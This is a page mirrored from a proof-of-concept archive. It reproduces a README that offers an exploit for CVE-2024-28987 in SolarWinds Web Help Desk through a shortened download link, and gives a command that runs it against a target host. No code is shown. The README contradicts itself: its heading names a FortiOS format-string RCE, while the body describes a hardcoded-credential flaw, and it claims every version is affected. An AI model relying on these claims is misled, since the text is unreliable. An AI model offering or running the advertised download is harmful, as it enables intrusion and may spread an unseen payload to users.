Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-28987 PoC — SolarWinds Web Help Desk Hardcoded Credential Vulnerability

Source
Associated Vulnerability
Title:SolarWinds Web Help Desk Hardcoded Credential Vulnerability (CVE-2024-28987)
Description:The SolarWinds Web Help Desk (WHD) software is affected by a hardcoded credential vulnerability, allowing remote unauthenticated user to access internal functionality and modify data.
Readme
# FortiOS and FortiProxy Format String  Vulnerability to RCE (CVE-2024-28987)

## Overview
CVE-2024-28987
The SolarWinds Web Help Desk (WHD) software is affected by a hardcoded credential vulnerability, allowing remote unauthenticated user to access internal functionality and modify data.

## Exploit:
### [Download here](https://bit.ly/3Z6R5l2)

## Details

- **CVE ID**: [CVE-2024-28987](https://nvd.nist.gov/vuln/detail/CVE-2024-28987)
- **Discovered** : 2024-08-21
- **Published**: 2024-10-16
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
- **CVSS**: 9.1

## Vulnerability Description

Exploitation of CVE-2024-28987 could allow an attacker to bypass security policies implemented in SolarWinds Web Help Desk, which could result in unauthorized access to sensitive data, modification of configurations, or other malicious actions that could compromise the integrity of the system. Given the frequent use of Web Help Desk in critical environments, such as businesses and administrations, this vulnerability presents a significant risk.


## Affected Versions

**Any**

## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```



## Exploit:
### [Download here](https://bit.ly/3Z6R5l2)


![image](https://github.com/expl0itsecurity/CVE-2024-28987/blob/main/infticketcve202428987.png)
![image](https://github.com/expl0itsecurity/CVE-2024-28987/blob/main/logcve202428987.png)
File Snapshot

[4.0K] /data/pocs/8c9e6bfcb009bc135ba3f4bf1947f7ce8b236941 ├── [ 38K] infticketcve202428987.png ├── [372K] logcve202428987.png └── [1.4K] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →